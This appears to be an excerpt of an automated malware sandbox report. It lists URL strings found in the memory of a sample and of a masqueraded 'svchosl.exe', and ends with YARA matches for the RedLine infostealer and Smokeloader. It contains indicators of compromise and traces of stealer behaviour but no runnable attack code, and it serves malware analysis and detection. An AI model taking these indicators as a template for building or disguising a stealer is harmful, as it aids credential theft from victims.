Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000063.00000002.2775834529.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/D
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: file.exe, 00000000.00000002.3280784216.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2
Source: file.exe, 00000000.00000002.3280784216.000000000495D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: file.exe, 00000000.00000002.3280784216.0000000004A10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id24ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: file.exe, 00000000.00000002.3280784216.000000000491B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: file.exe, 00000000.00000002.3280784216.0000000004965000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: svchosl.exe, 00000010.00000002.3278579497.0000021306970000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3277478424.000002130668E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: svchosl.exe, 00000010.00000003.2377885559.00000213066A2000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000003.2377835190.0000021305890000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3277478424.000002130668E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.python.org/
Source: svchosl.exe, 0000000E.00000003.2370258367.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3278024219.00000213067C0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.14.dr String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: svchosl.exe, 00000010.00000002.3277827122.0000021306740000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.14.dr String found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000063.00000002.2775834529.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000063.00000002.2775834529.0000000004E96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: mig.exe, 0000005D.00000003.2800628651.0000000007379000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: file.exe, 00000000.00000002.3280784216.0000000004881000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ipZSELSystem.Windows.FormsECT
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchosl.exe, 00000010.00000002.3275747889.000002130587E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: svchosl.exe, 00000010.00000002.3276701489.0000021305EC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: svchosl.exe, 00000010.00000002.3275747889.000002130587E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: svchosl.exe, 00000010.00000002.3275747889.000002130587E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: svchosl.exe, 00000010.00000002.3275747889.000002130587E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: svchosl.exe, 00000010.00000003.2377885559.00000213066A2000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000003.2377835190.0000021305890000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3277478424.000002130668E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mahler:8092/site-updates.py
Source: svchosl.exe, 0000000E.00000003.2370035552.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371533496.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369241126.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9D9000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2370807089.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373528666.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369399572.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369877536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369699265.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2372601536.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2369576437.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 0000000E.00000003.2373739228.000002061D9D6000.00000004.00000020.00020000.00000000.sdmp, select.pyd.14.dr, _bz2.pyd.14.dr, _ssl.pyd.14.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.3285742985.000000000598B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3280784216.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchosl.exe, 0000000E.00000003.2371684654.000002061D9CD000.00000004.00000020.00020000.00000000.sdmp, svchosl.exe, 00000010.00000002.3281359438.00007FF8A8AF9000.00000002.00000001.01000000.00000016.sdmp, svchosl.exe, 00000010.00000002.3283946529.00007FF8B8088000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: https://www.openssl.org/H
Too many similar processes found
Source: cmd.exe Process created: 98

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.file.exe.4420000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.file.exe.29e0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3277615325.00000000029E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000003.2077593562.0000000004420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3278134834.0000000002AA1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
